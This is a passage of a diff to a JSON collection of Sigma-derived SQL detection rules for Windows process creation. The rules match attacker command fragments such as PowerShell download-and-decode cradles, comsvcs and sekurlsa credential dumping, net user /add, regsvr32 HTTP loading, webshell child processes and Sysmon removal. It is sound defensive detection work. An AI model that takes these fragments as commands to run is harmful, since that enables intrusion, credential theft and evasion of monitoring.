'\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Service Security Descriptor Tampering Via Sc.EXE", - "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_modification.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "Suspicious Execution Of PDQDeployRunner", - "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Legitimate use" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Suspicious Network Command", - "id": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ - "Administrator, hotline ask to user" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' OR CommandLine LIKE '%netsh interface show interface%' ESCAPE '\\' OR CommandLine LIKE '%arp -a%' ESCAPE '\\' OR CommandLine LIKE '%nbtstat -n%' ESCAPE '\\' OR CommandLine LIKE '%net config%' ESCAPE '\\' OR CommandLine LIKE '%route print%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_network_command.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Use of Adplus.exe", - "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", - "status": "experimental", - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Custom Class Execution via Xwizard", + "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "status": "test", + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of Adplus" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" ], - "filename": "proc_creation_win_lolbin_adplus.yml" + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" }, { - "title": "Execution in Webserver Root Folder", - "id": "35efb964-e6a5-47ad-bbcd-19661854018d", - "status": "test", - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Various applications", - "Tools that include ping or nslookup command invocations" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Process Creation Using Sysnative Folder", - "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", + "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "status": "experimental", - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "author": "Max Altgelt (Nextron Systems)", - "tags": [ - "attack.t1055" - ], + "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", + "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_sysnative.yml" + "filename": "proc_creation_win_powershell_download_dll.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1566.001", "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1203", + "attack.t1059.003", + "attack.g0032" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Windows Binary Executed From WSL", - "id": "ed825c86-c009-4014-b413-b76003e33d35", - "status": "experimental", - "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Extrac32 Alternate Data Stream Execution", + "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "status": "test", + "description": "Extract data from cab file and hide it in an alternate data stream", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1202" + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" + "filename": "proc_creation_win_lolbin_extrac32_ads.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", + "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate piping of the password to anydesk", + "Some FP could occur with similar tools that uses the same command line '--set-password'" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.g0069" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "blueteamer8699", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_gather_network_info.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 